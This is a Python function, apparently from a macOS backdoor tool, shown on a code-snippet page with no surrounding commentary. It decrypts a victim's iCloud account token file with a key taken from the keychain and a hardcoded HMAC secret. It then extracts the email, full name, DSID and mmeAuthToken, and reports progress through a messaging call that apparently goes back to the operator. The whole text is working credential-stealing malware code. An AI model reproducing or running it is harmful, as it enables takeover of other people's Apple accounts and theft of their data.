def kciCloudHelper(iCloudKey):
#this function is tailored to keychaindump. Takes an iCloud key, and returns tokens
msg = base64.b64decode(iCloudKey)
key = "t9s\"lx^awe.580Gj%'ld+0LG<#9xa?>vb)-fkwb92[}"
hashed = hmac.new(key, msg, digestmod=hashlib.md5).digest()
hexedKey = binascii.hexlify(hashed)
IV = 16 * '0'
mme_token_file = glob("/Users/%s/Library/Application Support/iCloud/Accounts/*" % get_bella_user()) #this doesnt need to be globber bc only current user's info can be decrypted
for x in mme_token_file:
try:
int(x.split("/")[-1])
mme_token_file = x
except ValueError:
continue
send_msg("\t%sDecrypting token plist\n\t [%s]\n" % (blue_star, mme_token_file), False)
decryptedBinary = subprocess.check_output("openssl enc -d -aes-128-cbc -iv '%s' -K %s < '%s'" % (IV, hexedKey, mme_token_file), shell=True)
from Foundation import NSData, NSPropertyListSerialization
binToPlist = NSData.dataWithBytes_length_(decryptedBinary, len(decryptedBinary))
token_plist = NSPropertyListSerialization.propertyListWithData_options_format_error_(binToPlist, 0, None, None)[0]
tokz = "[%s | %s]\n" % (token_plist["appleAccountInfo"]["primaryEmail"], token_plist["appleAccountInfo"]["fullName"])
tokz += "%s:%s\n" % (token_plist["appleAccountInfo"]["dsPrsID"], token_plist["tokens"]["mmeAuthToken"])
return tokz
评论列表
文章目录
